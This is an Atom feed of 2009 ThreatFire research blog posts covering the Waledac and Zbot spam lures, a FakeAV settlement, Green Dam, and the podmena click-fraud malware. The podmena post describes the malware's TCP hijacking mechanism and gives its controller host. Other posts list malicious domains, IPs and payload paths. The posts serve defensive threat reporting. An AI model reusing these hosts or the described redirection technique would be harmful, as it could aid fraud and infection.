&lt;br /&gt;&lt;br /&gt;In practice, though, the heap spray attack code we have seen in the wild is reliable and takes less effort than precise control of the SEH overwrite, and what has worked in the past will keep being deployed in volume.&lt;br /&gt;&lt;br /&gt;In the meantime, your information is protected against both the observed and as yet unknown exploits for this vulnerability with &lt;a href="http://www.threatfire.com/" target="_blank"&gt;ThreatFire&lt;/a&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4791623931968320973-7431765013037890986?l=blog.threatfire.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ThreatfireResearchBlog/~4/_lNAeT_zD1M" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.threatfire.com/feeds/7431765013037890986/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=4791623931968320973&amp;postID=7431765013037890986" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/7431765013037890986" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/7431765013037890986" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/ThreatfireResearchBlog/~3/_lNAeT_zD1M/activex-msvidctl-0day.html" title="ActiveX MsVidCtl 0day" /><author><name>ThreatFire Blogger</name><uri>http://www.blogger.com/profile/02520640955013507047</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="13839882541104122155" /></author><thr:total 
xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.threatfire.com/2009/07/activex-msvidctl-0day.html</feedburner:origLink></entry><entry><id>tag:blogger.com,1999:blog-4791623931968320973.post-4014337533463558306</id><published>2009-07-08T09:51:00.001-07:00</published><updated>2009-07-08T14:10:50.050-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Contests" /><title type="text">Google Native Client Security Contest</title><content type="html">The &lt;a href="http://googlecode.blogspot.com/2009/07/native-client-security-contest-results.html" target="_blank"&gt;results&lt;/a&gt; and &lt;a href="http://code.google.com/contests/nativeclient-security/" target="_blank"&gt;the PoC&lt;/a&gt; are in; congratulations to Mark Dowd and Ben Hawkes for uncovering 12 vulnerabilities in the open source &lt;a href="http://code.google.com/p/nativeclient/" target="_blank"&gt;Google Native Client&lt;/a&gt;: "Native Client is an open-source research technology for running x86 native code in web applications, with the goal of maintaining the browser neutrality, OS portability, and safety that people expect from web apps".&lt;br /&gt;&lt;br /&gt;The project raises the question "Do we need another ActiveX?", or rather, "do we need a &lt;a href="http://blog.threatfire.com/2009/07/activex-msvidctl-0day.html" target="_blank"&gt;safer ActiveX&lt;/a&gt; for running untrusted and arbitrary code from within a browser on all platforms?". While the contest showed that buffer overflows can be present in the sandbox itself, several of which appear to remain open issues, Google claims that the architecture itself has been strengthened and validated by the contest: "This contest helped us discover implementation errors in Native Client and some areas of our codebase we need to spend more time reviewing. 
More importantly, that no major architectural flaws were found provides evidence that Native Client can be made safe enough for widespread use. Toward that end, we're implementing additional security measures, such as an outer sandbox". The contest seems to be a great way to clean up code, but the claims seem somewhat questionable. Just see what &lt;a href="http://lists.immunitysec.com/pipermail/dailydave/2009-July/005789.html" target="_blank"&gt;Dave Aitel&lt;/a&gt; has to say about what architectural flaws really are.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4791623931968320973-4014337533463558306?l=blog.threatfire.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ThreatfireResearchBlog/~4/u3MfMH02Rxw" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.threatfire.com/feeds/4014337533463558306/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=4791623931968320973&amp;postID=4014337533463558306" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/4014337533463558306" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/4014337533463558306" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/ThreatfireResearchBlog/~3/u3MfMH02Rxw/google-native-client-security-contest.html" title="Google Native Client Security Contest" /><author><name>ThreatFire Blogger</name><uri>http://www.blogger.com/profile/02520640955013507047</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="13839882541104122155" /></author><thr:total 
xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.threatfire.com/2009/07/google-native-client-security-contest.html</feedburner:origLink></entry><entry><id>tag:blogger.com,1999:blog-4791623931968320973.post-3664005105914380147</id><published>2009-07-04T16:35:00.000-07:00</published><updated>2009-07-05T04:55:33.186-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Waledac" /><category scheme="http://www.blogger.com/atom/ns#" term="Bot" /><category scheme="http://www.blogger.com/atom/ns#" term="Social Engineering" /><title type="text">Waledac Fourth of July Run</title><content type="html">Over the past couple of months, the Waledac spam/botnet effort seemed to be dwindling. A large software company attempted to take credit for cleaning up the "ecosystem" of Waledac with their cleanup tool release.&lt;br /&gt;&lt;br /&gt;In the meantime, Waledac's presence on systems started to change and appear in lower volumes, flying under the radar of many groups. The ThreatFire community saw Waledac code injected into svchost processes and prevented by ThreatFire in low volumes, bundled with other attacks.&lt;br /&gt;&lt;br /&gt;So, it is somewhat surprising that the botnet group just cannot pass up another holiday, blasting out attention-attracting mail and flashy websites. Symantec &lt;a href="http://www.symantec.com/connect/blogs/waledac-july-campaign" target="_blank"&gt;reported&lt;/a&gt; on the spam messages sent out to entice users to visit malicious Waledac web sites, download and install the bot. 
In addition to the spam, here is the grammatically incorrect Waledac text from a screenshot of the YouTube spoofed sites set up by the distributors to fool users into running the downloaded malware:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_YaXoRZbsXc4/Sk_oQBxHE6I/AAAAAAAAA3w/wnyG5_YN88o/s1600-h/Waledac_Youtube.png" target="_blank"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 269px;" src="http://1.bp.blogspot.com/_YaXoRZbsXc4/Sk_oQBxHE6I/AAAAAAAAA3w/wnyG5_YN88o/s320/Waledac_Youtube.png" alt="" id="BLOGGER_PHOTO_ID_5354753844016780194" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;"Colorful Independence Day events took place throughout the country&lt;br /&gt;&lt;br /&gt;This year July 4th firework's shows were surprisingly amazing. The largest firework happend this Saturday. Unprecedented sum of money was spent on this fabulous show even despite crisis. The American Pyrotechnics Association has named South Shore's Fourth of July fireworks show as the best pyrotechnic displays in the nation. If you want to see this fantastic show just click on the video below and press "Run"."&lt;br /&gt;&lt;br /&gt;When a user clicks on the phony video frame, the malicious Waledac executables with names like "video.exe", "movie.exe", "run.exe", "setup.exe" and others are served up.&lt;br /&gt;The victim must then run the executables, no client side exploits are being delivered on multiple observed Waledac sites. Currently, fast-flux domains to avoid for this Waledac run include (but are not limited to):&lt;br /&gt;4thfirework. com&lt;br /&gt;holifireworks. com&lt;br /&gt;video4thjuly. com&lt;br /&gt;holidayfirework. com&lt;br /&gt;moviefireworks. com&lt;br /&gt;fireworksnetwork. com&lt;br /&gt;movies4thjuly. com&lt;br /&gt;happyindependence. com&lt;br /&gt;freeindependence. com&lt;br /&gt;fireworkspoint. 
com&lt;br /&gt;movie4thjuly. com&lt;br /&gt;fireworksholiday. com&lt;br /&gt;moviesfireworks. com&lt;br /&gt;&lt;br /&gt;Instead of registering these domains through Xin Net Technologies, this time around they were registered through China Springboard, Inc. It is quite likely that this provider will be one to watch for the next few holidays.&lt;br /&gt;&lt;br /&gt;The bot itself continues to maintain a list of peer nodes for its P2P over HTTP technology in clean XML formatted data and is packed with techniques consistent with those used prior to this release -- not much has changed here.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Happy Fourth of July to our American readers and safe browsing!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4791623931968320973-3664005105914380147?l=blog.threatfire.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ThreatfireResearchBlog/~4/3hTZ9hYFSIM" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.threatfire.com/feeds/3664005105914380147/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=4791623931968320973&amp;postID=3664005105914380147" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/3664005105914380147" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/3664005105914380147" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/ThreatfireResearchBlog/~3/3hTZ9hYFSIM/waledac-fourth-of-july-run.html" title="Waledac Fourth of July Run" /><author><name>ThreatFire Blogger</name><uri>http://www.blogger.com/profile/02520640955013507047</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" 
value="13839882541104122155" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_YaXoRZbsXc4/Sk_oQBxHE6I/AAAAAAAAA3w/wnyG5_YN88o/s72-c/Waledac_Youtube.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.threatfire.com/2009/07/waledac-fourth-of-july-run.html</feedburner:origLink></entry><entry><id>tag:blogger.com,1999:blog-4791623931968320973.post-138956376196240788</id><published>2009-07-02T23:40:00.000-07:00</published><updated>2009-07-03T00:27:55.598-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Adware" /><category scheme="http://www.blogger.com/atom/ns#" term="cybercrime" /><category scheme="http://www.blogger.com/atom/ns#" term="Social Engineering" /><category scheme="http://www.blogger.com/atom/ns#" term="Rogueware" /><category scheme="http://www.blogger.com/atom/ns#" term="FakeAlert" /><title type="text">FakeAv Settlement</title><content type="html">The FTC recently settled against a &lt;a href="http://www.ftc.gov/opa/2009/06/winsoftware.shtm" target="_blank"&gt;FakeAv purveyor&lt;/a&gt;. While this settlement won't remove all of the variants out there, it is welcome news nonetheless, with ongoing progress and the case list &lt;a href="http://www.ftc.gov/os/caselist/0723137/index.shtm" target="_blank"&gt;here&lt;/a&gt;. The fewer distributors of XP Antivirus the better: "The two settling defendants were part of a massive deceptive advertising scheme that tricked more than a million consumers into buying “rogue” computer security products, including &lt;span style="font-weight: bold;"&gt;WinFixer, WinAntivirus, DriveCleaner, ErrorSafe, and XP Antivirus&lt;/span&gt;, according to the FTC’s complaint." 
ThreatFire users were protected from a number of these scareware software packages, including &lt;a href="http://blog.threatfire.com/2008/06/fakealert-variant.html" target="_blank"&gt;XP Antivirus&lt;/a&gt;, in high volumes within the community back in mid-2008 and earlier.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_YaXoRZbsXc4/Sk2we27kP7I/AAAAAAAAA3o/QJYvUfmXgdE/s1600-h/xp_antivirussecurity2008.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 265px;" src="http://3.bp.blogspot.com/_YaXoRZbsXc4/Sk2we27kP7I/AAAAAAAAA3o/QJYvUfmXgdE/s320/xp_antivirussecurity2008.png" alt="" id="BLOGGER_PHOTO_ID_5354129576201306034" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.ftc.gov/os/caselist/0723137/081202innovativemrktgcmplt.pdf" target="_blank"&gt;The FTC's complaint&lt;/a&gt; from December calls this stuff scareware, also called "rogueware". It's amazing how many users really fell for and continue to fall for this stuff, and then cannot get their money back. 
According to the complaint:&lt;br /&gt;"Unaware of the Defendants' trickery, more than one million consumers have purchased the Defendants' software products to cure their computers of the non-existent problems "detected" by the Defendants' fake scans...&lt;br /&gt;Although some consumers later realize they have been defrauded by Defendants and attempt to seek refunds, Defendants routinely delay, obstruct and refuse to honor such requests."&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4791623931968320973-138956376196240788?l=blog.threatfire.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ThreatfireResearchBlog/~4/mOEZRIy_yDQ" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.threatfire.com/feeds/138956376196240788/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=4791623931968320973&amp;postID=138956376196240788" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/138956376196240788" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/138956376196240788" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/ThreatfireResearchBlog/~3/mOEZRIy_yDQ/fakeav-settlement.html" title="FakeAv Settlement" /><author><name>ThreatFire Blogger</name><uri>http://www.blogger.com/profile/02520640955013507047</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="13839882541104122155" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_YaXoRZbsXc4/Sk2we27kP7I/AAAAAAAAA3o/QJYvUfmXgdE/s72-c/xp_antivirussecurity2008.png" height="72" width="72" /><thr:total 
xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.threatfire.com/2009/07/fakeav-settlement.html</feedburner:origLink></entry><entry><id>tag:blogger.com,1999:blog-4791623931968320973.post-2313300600395790996</id><published>2009-07-02T16:27:00.000-07:00</published><updated>2009-07-02T16:46:49.188-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Security breach" /><category scheme="http://www.blogger.com/atom/ns#" term="Exploit" /><title type="text">Green Dam Controversy</title><content type="html">The Green Dam project to filter or censor web access on PCs sold in China is blossoming into a controversy. From the &lt;a href="http://www.cse.umich.edu/%7Ejhalderm/pub/gd/" target="_blank"&gt;Wolchok, Yao, Halderman analysis&lt;/a&gt; of the software, which added to the buildup:&lt;br /&gt;"According to press reports, China will soon require all PCs sold in the country to include Green Dam. This software monitors web sites visited and other activity on the computer and blocks adult content as well as politically sensitive material...We examined the Green Dam software and found that it contains serious security vulnerabilities due to programming errors...In the meantime, we recommend that users protect themselves by uninstalling Green Dam immediately."&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_YaXoRZbsXc4/Sk1G0n7YKkI/AAAAAAAAA3g/aoos5CmLaJo/s1600-h/GDblock.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 213px;" src="http://2.bp.blogspot.com/_YaXoRZbsXc4/Sk1G0n7YKkI/AAAAAAAAA3g/aoos5CmLaJo/s320/GDblock.png" alt="" id="BLOGGER_PHOTO_ID_5354013401898560066" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;In light of the issues, the installation mandate seems to have been delayed indefinitely. 
We'll add more info as it comes to light and &lt;a href="http://wikileaks.org/wiki/A_technical_analysis_of_the_Chinese_%27Green_Dam_Youth-Escort%27_censorship_software" target="_blank"&gt;wikileaks&lt;/a&gt; comes back up.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4791623931968320973-2313300600395790996?l=blog.threatfire.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ThreatfireResearchBlog/~4/JO429dIPMU4" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.threatfire.com/feeds/2313300600395790996/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=4791623931968320973&amp;postID=2313300600395790996" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/2313300600395790996" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/2313300600395790996" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/ThreatfireResearchBlog/~3/JO429dIPMU4/green-dam-controversy.html" title="Green Dam Controversy" /><author><name>ThreatFire Blogger</name><uri>http://www.blogger.com/profile/02520640955013507047</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="13839882541104122155" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_YaXoRZbsXc4/Sk1G0n7YKkI/AAAAAAAAA3g/aoos5CmLaJo/s72-c/GDblock.png" height="72" width="72" /><thr:total 
xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.threatfire.com/2009/07/green-dam-controversy.html</feedburner:origLink></entry><entry><id>tag:blogger.com,1999:blog-4791623931968320973.post-8571513494619602011</id><published>2009-07-02T09:01:00.000-07:00</published><updated>2009-07-08T16:50:14.793-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="ZBot" /><title type="text">Michael Jackson X-Files Answer</title><content type="html">Yesterday, amid the heavy Michael Jackson news coverage and tabloid autopsy speculations, another round of email was spammed out with the following text:&lt;br /&gt;&lt;br /&gt;Michael Jackson Was Killed...&lt;br /&gt;But Who Killed Michael Jackson?&lt;br /&gt;Visit X-Files to see the answer:&lt;br /&gt;(hxxp://xfiles link here)&lt;br /&gt;&lt;br /&gt;The link redirected to a site hosted at 87.97.116.131 in an X-Files-esque directory "x-files/x-file-mjacksonkiller.exe", which is currently down. The site hosted a malformed PDF and a &lt;a href="http://www.threatexpert.com/report.aspx?md5=0418E1FAD04CA45E0353AC319F6594AB" target="_blank"&gt;Zbot banking password stealing variant&lt;/a&gt;. The ThreatFire community prevented the file in very low prevalence, so very few users are falling for this sort of shameless scam. But we remind you to always think twice before running an unknown executable or visiting an untrusted site (the URL for this one is most likely not a domain one would recognize: jillih. com), regardless of the news. 
And update third party plugins on your system like pdf readers.&lt;br /&gt;&lt;br /&gt;Update (7/8/09): hooks added to the Zbot code described &lt;a href="http://blog.threatfire.com/2009/07/michael-jackson-zbot-data-stealing.html" target="_blank"&gt;here&lt;/a&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4791623931968320973-8571513494619602011?l=blog.threatfire.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ThreatfireResearchBlog/~4/qglrC0g5cz8" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.threatfire.com/feeds/8571513494619602011/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=4791623931968320973&amp;postID=8571513494619602011" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/8571513494619602011" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/8571513494619602011" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/ThreatfireResearchBlog/~3/qglrC0g5cz8/michael-jackson-x-files-answer.html" title="Michael Jackson X-Files Answer" /><author><name>ThreatFire Blogger</name><uri>http://www.blogger.com/profile/02520640955013507047</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="13839882541104122155" /></author><thr:total 
xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.threatfire.com/2009/07/michael-jackson-x-files-answer.html</feedburner:origLink></entry><entry><id>tag:blogger.com,1999:blog-4791623931968320973.post-1252087795118501817</id><published>2009-06-30T14:26:00.000-07:00</published><updated>2009-06-30T14:48:54.907-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Government and Cybersecurity" /><title type="text">Russia and U.S. Cybersecurity Efforts</title><content type="html">The New York Times reported on the developing challenges governments face in confronting cybersecurity, in an article about the &lt;a href="http://www.nytimes.com/2009/06/28/world/28cyber.html"&gt;differing approaches between Russia and the U.S.&lt;/a&gt;: "The United States and Russia are locked in a fundamental dispute over how to counter the growing threat of cyberwar attacks that could wreak havoc on computer systems and the Internet." The countries' political leaders will meet later this week, which may result in higher levels of cooperation between law enforcement agencies on an international level, more discussion around treaties, or absolutely nothing at all. 
We'll be watching.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4791623931968320973-1252087795118501817?l=blog.threatfire.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ThreatfireResearchBlog/~4/odhrwS5cXdA" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.threatfire.com/feeds/1252087795118501817/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=4791623931968320973&amp;postID=1252087795118501817" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/1252087795118501817" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/1252087795118501817" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/ThreatfireResearchBlog/~3/odhrwS5cXdA/russia-and-us-cybersecurity-efforts.html" title="Russia and U.S. 
Cybersecurity Efforts" /><author><name>ThreatFire Blogger</name><uri>http://www.blogger.com/profile/02520640955013507047</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="13839882541104122155" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.threatfire.com/2009/06/russia-and-us-cybersecurity-efforts.html</feedburner:origLink></entry><entry><id>tag:blogger.com,1999:blog-4791623931968320973.post-5656443355917037278</id><published>2009-06-18T15:34:00.000-07:00</published><updated>2009-06-19T10:24:15.730-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Adware" /><category scheme="http://www.blogger.com/atom/ns#" term="Click Fraud" /><title type="text">Podmena, podmena.dll and podmena.sys = spoof, spoof.dll, spoof.sys</title><content type="html">We have been investigating and analyzing a variety of malicious components delivered from some recent downloaders. Some of the filenames stand out as unusual. In particular, "podmena",&lt;br /&gt;which translates from Russian to English as "substitution or replacement made in a covert way" ("pod" - "sub" or "under", as in under cover; "mena" - the root of the word for exchange); thus it often stands for "spoof", "fake", etc. "Spoof" is fitting.&lt;br /&gt;&lt;br /&gt;The two "podmena" files dropped by the &lt;a href="http://blog.threatfire.com/2009/06/softwarefortubeview-moves-to-new-home.html"&gt;phony codec/viewer installs&lt;/a&gt; seem to be gathering much interest and gaining prevalence. 
They'll be discussed here and the post itself will be updated with new information as it is uncovered.&lt;br /&gt;&lt;br /&gt;First off, the files are dropped as one of the many payloads during the phony codec downloader attacks described in previous posts &lt;a href="http://blog.threatfire.com/2009/06/streamviewers-gif-images-embedded-with.html"&gt;here&lt;/a&gt;, &lt;a href="http://blog.threatfire.com/2009/06/softwarefortubeview-moves-to-new-home.html"&gt;here&lt;/a&gt; and &lt;a href="http://blog.threatfire.com/2009/05/softwarefortubeview-codec-schemes.html"&gt;here&lt;/a&gt;. The components seem to be a part of a click fraud scheme and a way to generate potentially artificial traffic volume to several search engines, including bee-find.com, missngpage.com, 102.123bounce.com, and www.search.pro.&lt;br /&gt;&lt;br /&gt;Podmena.dll gets registered as a ServiceDll to be run via svchost.exe -k podmena.dll.&lt;br /&gt;Podmena.sys is installed as a kernel driver to run at startup and attaches to \Device\Tcp, intercepting all TCP-related IRPs.&lt;br /&gt;&lt;br /&gt;The Dll upon startup sends a DeviceIoControl() request to the driver opened on \\.\podmena\.  The initial IO control code tells the driver to monitor outbound TCP port 80, and redirect all packets to 127.0.0.1:8085.  Then, the dll sends a second IO control code to the driver, which activates the forwarding.&lt;br /&gt;&lt;br /&gt;The Dll will create a bound listening port on 8085 which now acts as an HTTP proxy for all outbound port 80 traffic.  Upon packet reception (after it is redirected by the driver), the Dll will scan the requested URL for search keywords based on the domain name of the request.  
(i.e. search.yahoo, google, youtube, yahooapis, metacafe, sugg.search, aolcdn, etc.)&lt;br /&gt;&lt;br /&gt;When a keyword is found, it will submit the text to its parent controller (the binaries that we have seen hard-code "zz-dn.com", which is unavailable, and then fall back to 85.13.236.134, an IP hosted in London).  Depending on some timing randomization, the Dll will then load up and send the web browser to URLs based on the response it receives back from this parent controller.&lt;br /&gt;&lt;br /&gt;In our lab, subsequent requests were sent to a variety of sites, with all of these sites hosting a variety of ads, even without visiting a search engine. The svchost process loaded up with podmena.dll can visit hundreds of sites approximately every ten minutes, depending on the instruction response it receives.&lt;br /&gt;&lt;br /&gt;Oddly, we have not seen higher-value targets like banking user IDs and passwords stolen by these components.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4791623931968320973-5656443355917037278?l=blog.threatfire.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ThreatfireResearchBlog/~4/6k-Xf680MfE" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.threatfire.com/feeds/5656443355917037278/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=4791623931968320973&amp;postID=5656443355917037278" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/5656443355917037278" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/5656443355917037278" /><link rel="alternate" type="text/html" 
href="http://feedproxy.google.com/~r/ThreatfireResearchBlog/~3/6k-Xf680MfE/podmena-podmenadll-and-podmenasys-spoof.html" title="Podmena, podmena.dll and podmena.sys = spoof, spoof.dll, spoof.sys" /><author><name>ThreatFire Blogger</name><uri>http://www.blogger.com/profile/02520640955013507047</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="13839882541104122155" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.threatfire.com/2009/06/podmena-podmenadll-and-podmenasys-spoof.html</feedburner:origLink></entry><entry><id>tag:blogger.com,1999:blog-4791623931968320973.post-8302462810435987831</id><published>2009-06-18T11:13:00.000-07:00</published><updated>2009-06-18T16:56:52.144-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Koobface" /><category scheme="http://www.blogger.com/atom/ns#" term="Bot" /><category scheme="http://www.blogger.com/atom/ns#" term="Social Engineering" /><category scheme="http://www.blogger.com/atom/ns#" term="Rogueware" /><category scheme="http://www.blogger.com/atom/ns#" term="FakeAlert" /><title type="text">Wanna See Harry Potter and the Half-Blood Prince?</title><content type="html">You're going to have to wait for it to come out. And if you don't, you may be sorry you didn't wait.&lt;br /&gt;&lt;br /&gt;The group pushing blackhat SEO tactics to abuse the most popular networks, including digg.com, blogspot.com and others, continues to prey on those interested in upcoming movie releases.&lt;br /&gt;&lt;br /&gt;First, a user most likely will come across popularized phony links within the blogosphere. 
Here is an example of the group's digg.com abuse, where they entice Harry Potter fans with text: 'Watch "Harry Potter and the Half-Blood Prince" online free', and fill up the digg comment list with related keywords to attract more search engines:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_YaXoRZbsXc4/SjqGVKV-_iI/AAAAAAAAA3I/Ks4VSQxN_tU/s1600-h/digg_link.png" target="_blank"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 270px;" src="http://3.bp.blogspot.com/_YaXoRZbsXc4/SjqGVKV-_iI/AAAAAAAAA3I/Ks4VSQxN_tU/s320/digg_link.png" alt="" id="BLOGGER_PHOTO_ID_5348735205567823394" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;This link redirects to a blogspot post that contains more images from the movie itself, intensifying the anticipation and convincing the user that the movie is only one click away 'Watch "Harry Potter and the Half-Blood Prince" movie 2009 online for free'. 
